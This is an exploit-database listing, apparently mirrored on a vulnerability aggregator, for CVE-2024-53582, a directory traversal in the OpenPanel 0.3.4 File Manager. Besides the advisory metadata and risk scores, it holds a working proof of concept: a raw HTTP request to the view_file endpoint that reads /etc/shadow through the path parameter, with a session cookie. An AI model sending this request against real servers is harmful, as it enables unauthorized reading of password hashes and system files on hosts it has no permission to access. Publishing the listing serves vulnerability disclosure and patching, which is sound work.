OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal

🗓️ 14 Apr 2025 00:00:00Reported by Korn Chaisuwan, Charanin Thongudom, Pongtorn AngsuchotmeteeType

exploitdb🔗 www.exploit-db.com👁 176 Views

OpenPanel File Manager 0.3.4 vulnerable to directory traversal via Copy and View functions.

Reporter	Title	Published	Views	Family All 12
0day.today	OpenPanel 0.3.4 Directory Traversal Vulnerability	30 Jan 202500:00	–	zdt
Circl	CVE-2024-53582	31 Jan 202516:16	–	circl
CNNVD	OpenPanel 安全漏洞	31 Jan 202500:00	–	cnnvd
CVE	CVE-2024-53582	31 Jan 202500:00	–	cve
Cvelist	CVE-2024-53582	31 Jan 202500:00	–	cvelist
Exploit DB	OpenPanel 0.3.4 - Incorrect Access Control	14 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-51999	3 Oct 202520:07	–	euvd
NVD	CVE-2024-53582	31 Jan 202516:15	–	nvd
Packet Storm	OpenPanel 0.3.4 Directory Traversal	29 Jan 202500:00	–	packetstorm
Positive Technologies	PT-2025-2970 · Openpanel · Openpanel	31 Jan 202500:00	–	ptsecurity

# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

14 Apr 2025 00:00Current

7High risk

Vulners AI Score7

CVSS 3.17.5

EPSS0.03067

SSVC